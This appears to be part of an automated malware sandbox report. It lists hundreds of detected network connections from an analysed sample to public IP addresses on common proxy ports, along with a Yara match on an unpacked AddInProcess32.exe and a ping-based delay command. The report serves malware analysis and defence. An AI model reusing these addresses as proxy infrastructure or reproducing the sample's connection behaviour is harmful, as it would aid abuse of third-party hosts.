                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 88 -> 50566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 55005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 5003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 444
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32708 -> 50650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50895 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 34411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 7890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 15779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50991 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50917 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50789 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 50677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 46783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50951 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 35513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51159 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 46164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 48114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 8084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51051 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51141 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 44374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51228 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 14888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51118 -> 808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50248
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51099 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 17982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51104 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 4154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 29870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 5025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50376 -> 55443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 63625
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51221 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51329 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5484
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10089 -> 50985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51453 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 50915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 1131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9229 -> 50392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51440 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51260 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51308 -> 6002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 83
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50427 -> 54393
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51401 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 56755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 47851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51499 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14888 -> 51132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8084 -> 50975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51517 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 64309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 32770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 47152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51468
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51527 -> 21025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 4145
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: Yara match File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: unknown Network traffic detected: IP country count 30
                  Source: global trafficTCP traffic: 192.168.2.5:50066 -> 3.122.84.99:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50067 -> 159.65.39.234:7732
                  Source: global trafficTCP traffic: 192.168.2.5:50069 -> 92.118.132.125:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50070 -> 62.112.11.204:26431
                  Source: global trafficTCP traffic: 192.168.2.5:50072 -> 185.128.153.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50074 -> 46.209.100.252:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50075 -> 37.52.50.28:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50076 -> 45.70.236.121:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50077 -> 107.152.98.5:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50078 -> 91.199.93.32:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50079 -> 171.243.25.220:31350
                  Source: global trafficTCP traffic: 192.168.2.5:50080 -> 223.206.142.49:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50083 -> 103.186.90.18:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50086 -> 101.255.140.1:8090
                  Source: global trafficTCP traffic: 192.168.2.5:50088 -> 5.34.201.244:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50089 -> 107.180.90.88:62908
                  Source: global trafficTCP traffic: 192.168.2.5:50085 -> 206.42.40.0:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50091 -> 189.203.181.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50093 -> 103.216.51.36:32650
                  Source: global trafficTCP traffic: 192.168.2.5:50094 -> 67.43.228.251:5999
                  Source: global trafficTCP traffic: 192.168.2.5:50097 -> 103.156.140.237:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50099 -> 51.161.131.84:49202
                  Source: global trafficTCP traffic: 192.168.2.5:50101 -> 190.104.20.85:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50102 -> 18.134.236.231:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50103 -> 159.223.71.71:51187
                  Source: global trafficTCP traffic: 192.168.2.5:50104 -> 190.138.250.48:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50105 -> 113.99.188.254:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50107 -> 183.96.235.105:18572
                  Source: global trafficTCP traffic: 192.168.2.5:50108 -> 37.187.77.58:13412
                  Source: global trafficTCP traffic: 192.168.2.5:50109 -> 38.52.222.254:999
                  Source: global trafficTCP traffic: 192.168.2.5:50110 -> 1.20.220.79:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50111 -> 154.79.254.236:32650
                  Source: global trafficTCP traffic: 192.168.2.5:50113 -> 46.101.102.134:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50114 -> 203.96.177.211:55005
                  Source: global trafficTCP traffic: 192.168.2.5:50115 -> 103.165.155.163:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50116 -> 94.177.106.178:2324
                  Source: global trafficTCP traffic: 192.168.2.5:50117 -> 160.153.245.187:59786
                  Source: global trafficTCP traffic: 192.168.2.5:50118 -> 103.167.68.255:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50119 -> 160.251.6.106:10008
                  Source: global trafficTCP traffic: 192.168.2.5:50120 -> 144.76.92.16:14618
                  Source: global trafficTCP traffic: 192.168.2.5:50121 -> 213.6.155.9:19000
                  Source: global trafficTCP traffic: 192.168.2.5:50123 -> 94.247.241.70:53640
                  Source: global trafficTCP traffic: 192.168.2.5:50124 -> 175.100.91.151:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50125 -> 103.148.130.5:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50127 -> 144.91.66.30:51110
                  Source: global trafficTCP traffic: 192.168.2.5:50128 -> 201.77.108.64:999
                  Source: global trafficTCP traffic: 192.168.2.5:50129 -> 184.185.2.12:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50130 -> 94.23.83.53:55806
                  Source: global trafficTCP traffic: 192.168.2.5:50131 -> 198.12.255.193:9375
                  Source: global trafficTCP traffic: 192.168.2.5:50132 -> 160.248.80.91:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50133 -> 162.240.39.58:45840
                  Source: global trafficTCP traffic: 192.168.2.5:50136 -> 38.54.95.19:9080
                  Source: global trafficTCP traffic: 192.168.2.5:50137 -> 199.102.106.94:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50138 -> 103.85.114.249:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50139 -> 184.181.217.220:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50140 -> 222.124.177.148:7497
                  Source: global trafficTCP traffic: 192.168.2.5:50141 -> 185.236.202.170:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50143 -> 95.142.40.99:42140
                  Source: global trafficTCP traffic: 192.168.2.5:50144 -> 155.185.15.56:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50145 -> 103.19.129.137:83
                  Source: global trafficTCP traffic: 192.168.2.5:50146 -> 143.202.97.171:999
                  Source: global trafficTCP traffic: 192.168.2.5:50147 -> 45.4.252.217:999
                  Source: global trafficTCP traffic: 192.168.2.5:50148 -> 103.255.147.102:83
                  Source: global trafficTCP traffic: 192.168.2.5:50149 -> 124.158.186.254:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50151 -> 186.215.87.194:6000
                  Source: global trafficTCP traffic: 192.168.2.5:50152 -> 20.204.212.45:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50153 -> 165.227.104.122:29992
                  Source: global trafficTCP traffic: 192.168.2.5:50155 -> 118.99.108.4:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50156 -> 45.70.237.139:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50157 -> 68.1.210.163:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50158 -> 179.108.209.63:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50159 -> 66.29.129.54:47036
                  Source: global trafficTCP traffic: 192.168.2.5:50160 -> 46.28.111.54:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50161 -> 190.211.5.232:999
                  Source: global trafficTCP traffic: 192.168.2.5:50164 -> 39.74.195.25:9000
                  Source: global trafficTCP traffic: 192.168.2.5:50165 -> 180.241.249.131:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50167 -> 85.214.249.84:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50168 -> 197.234.121.222:8291
                  Source: global trafficTCP traffic: 192.168.2.5:50169 -> 185.65.205.171:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50170 -> 197.234.13.14:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50172 -> 110.76.129.30:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50176 -> 185.189.112.157:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50177 -> 103.79.96.218:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50181 -> 45.118.132.180:45449
                  Source: global trafficTCP traffic: 192.168.2.5:50182 -> 41.33.203.235:1976
                  Source: global trafficTCP traffic: 192.168.2.5:50183 -> 193.8.87.43:4444
                  Source: global trafficTCP traffic: 192.168.2.5:50184 -> 180.183.3.79:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50185 -> 45.162.132.1:999
                  Source: global trafficTCP traffic: 192.168.2.5:50186 -> 54.223.158.88:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50189 -> 142.54.239.1:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50188 -> 164.92.86.113:54597
                  Source: global trafficTCP traffic: 192.168.2.5:50190 -> 142.54.235.9:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50191 -> 194.233.78.142:35513
                  Source: global trafficTCP traffic: 192.168.2.5:50192 -> 103.153.135.100:8083
                  Source: global trafficTCP traffic: 192.168.2.5:50193 -> 162.241.46.6:62244
                  Source: global trafficTCP traffic: 192.168.2.5:50195 -> 91.92.80.199:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50196 -> 163.172.166.35:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50197 -> 162.214.102.195:34227
                  Source: global trafficTCP traffic: 192.168.2.5:50199 -> 92.241.92.218:14888
                  Source: global trafficTCP traffic: 192.168.2.5:50200 -> 45.230.39.123:999
                  Source: global trafficTCP traffic: 192.168.2.5:50202 -> 36.93.138.75:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50203 -> 103.76.12.58:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50204 -> 188.132.222.12:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50205 -> 154.239.9.94:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50207 -> 162.210.192.136:57403
                  Source: global trafficTCP traffic: 192.168.2.5:50209 -> 72.10.160.172:27283
                  Source: global trafficTCP traffic: 192.168.2.5:50210 -> 209.14.112.5:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50198 -> 165.22.96.68:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50208 -> 103.63.190.37:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50212 -> 27.145.61.163:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50213 -> 103.247.216.70:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50217 -> 47.88.3.19:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50219 -> 124.160.118.183:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50220 -> 62.171.131.101:35006
                  Source: global trafficTCP traffic: 192.168.2.5:50223 -> 37.187.73.7:23637
                  Source: global trafficTCP traffic: 192.168.2.5:50225 -> 186.251.255.93:31337
                  Source: global trafficTCP traffic: 192.168.2.5:50226 -> 186.226.171.94:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50229 -> 50.250.205.21:32100
                  Source: global trafficTCP traffic: 192.168.2.5:50230 -> 38.162.25.44:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50231 -> 103.144.209.104:3629
                  Source: global trafficTCP traffic: 192.168.2.5:50232 -> 47.245.56.108:18181
                  Source: global trafficTCP traffic: 192.168.2.5:50234 -> 51.158.77.220:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50235 -> 103.245.109.172:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50237 -> 154.79.246.18:9898
                  Source: global trafficTCP traffic: 192.168.2.5:50239 -> 201.157.254.26:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50240 -> 123.182.59.164:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50242 -> 36.95.48.45:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50244 -> 171.244.140.160:24015
                  Source: global trafficTCP traffic: 192.168.2.5:50245 -> 109.238.208.138:21231
                  Source: global trafficTCP traffic: 192.168.2.5:50246 -> 196.251.222.234:8104
                  Source: global trafficTCP traffic: 192.168.2.5:50247 -> 31.24.44.92:52173
                  Source: global trafficTCP traffic: 192.168.2.5:50248 -> 117.160.250.130:8899
                  Source: global trafficTCP traffic: 192.168.2.5:50250 -> 195.74.72.111:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50251 -> 125.99.106.250:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50252 -> 103.105.55.170:8085
                  Source: global trafficTCP traffic: 192.168.2.5:50253 -> 38.162.29.125:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50255 -> 46.226.148.105:36366
                  Source: global trafficTCP traffic: 192.168.2.5:50256 -> 103.79.96.217:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50257 -> 212.102.103.133:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50258 -> 14.56.98.15:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50259 -> 31.170.19.241:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50261 -> 207.180.234.220:48963
                  Source: global trafficTCP traffic: 192.168.2.5:50263 -> 148.101.163.165:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50265 -> 138.97.37.115:8189
                  Source: global trafficTCP traffic: 192.168.2.5:50266 -> 176.99.2.43:1081
                  Source: global trafficTCP traffic: 192.168.2.5:50267 -> 41.70.12.54:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50268 -> 5.10.249.159:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50271 -> 103.47.93.194:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50272 -> 103.82.11.209:4153
                  Source: global trafficTCP traffic: 192.168.2.5:50273 -> 62.89.9.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50274 -> 139.99.197.2:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50275 -> 20.204.214.79:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50276 -> 36.91.98.115:8181
                  Source: global trafficTCP traffic: 192.168.2.5:50278 -> 202.153.233.228:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50280 -> 103.35.190.18:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50281 -> 128.199.221.91:21605
                  Source: global trafficTCP traffic: 192.168.2.5:50282 -> 178.212.51.166:33333
                  Source: global trafficTCP traffic: 192.168.2.5:50283 -> 184.178.172.23:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50284 -> 51.158.105.107:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50285 -> 117.84.165.182:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50287 -> 183.91.80.194:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50289 -> 103.102.219.25:44550
                  Source: global trafficTCP traffic: 192.168.2.5:50291 -> 72.195.34.42:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50292 -> 93.157.248.108:88
                  Source: global trafficTCP traffic: 192.168.2.5:50294 -> 51.81.186.179:58630
                  Source: global trafficTCP traffic: 192.168.2.5:50297 -> 38.41.0.60:11201
                  Source: global trafficTCP traffic: 192.168.2.5:50298 -> 182.52.229.165:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50299 -> 105.234.156.109:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50301 -> 203.160.57.87:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50302 -> 185.200.37.245:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50303 -> 111.9.49.190:8060
                  Source: global trafficTCP traffic: 192.168.2.5:50304 -> 212.5.193.219:8880
                  Source: global trafficTCP traffic: 192.168.2.5:50306 -> 151.236.39.7:57248
                  Source: global trafficTCP traffic: 192.168.2.5:50307 -> 20.219.182.59:3129
                  Source: global trafficTCP traffic: 192.168.2.5:50308 -> 83.53.207.196:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50309 -> 72.167.38.7:45650
                  Source: global trafficTCP traffic: 192.168.2.5:50313 -> 103.155.166.149:8181
                  Source: global trafficTCP traffic: 192.168.2.5:50315 -> 104.165.127.146:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50317 -> 177.242.201.5:999
                  Source: global trafficTCP traffic: 192.168.2.5:50318 -> 103.206.208.135:55443
                  Source: global trafficTCP traffic: 192.168.2.5:50319 -> 132.148.245.55:22508
                  Source: global trafficTCP traffic: 192.168.2.5:50321 -> 5.78.89.192:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50324 -> 148.72.212.198:3950
                  Source: global trafficTCP traffic: 192.168.2.5:50325 -> 41.65.227.98:1981
                  Source: global trafficTCP traffic: 192.168.2.5:50327 -> 203.218.172.225:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50331 -> 96.70.52.227:48324
                  Source: global trafficTCP traffic: 192.168.2.5:50333 -> 92.205.61.38:36073
                  Source: global trafficTCP traffic: 192.168.2.5:50334 -> 190.120.249.149:4145
                  Source: global trafficTCP traffic: 192.168.2.5:50336 -> 101.230.172.86:9443
                  Source: global trafficTCP traffic: 192.168.2.5:50339 -> 138.197.38.62:20220
                  Source: global trafficTCP traffic: 192.168.2.5:50341 -> 168.205.100.36:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50342 -> 101.255.166.134:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50343 -> 67.213.212.56:51774
                  Source: global trafficTCP traffic: 192.168.2.5:50344 -> 115.79.26.196:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50345 -> 65.1.40.47:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50346 -> 82.137.245.41:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50349 -> 37.148.217.234:999
                  Source: global trafficTCP traffic: 192.168.2.5:50352 -> 31.172.66.22:20466
                  Source: global trafficTCP traffic: 192.168.2.5:50354 -> 209.14.112.4:1080
                  Source: global trafficTCP traffic: 192.168.2.5:50357 -> 83.243.92.154:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50358 -> 103.155.54.26:83
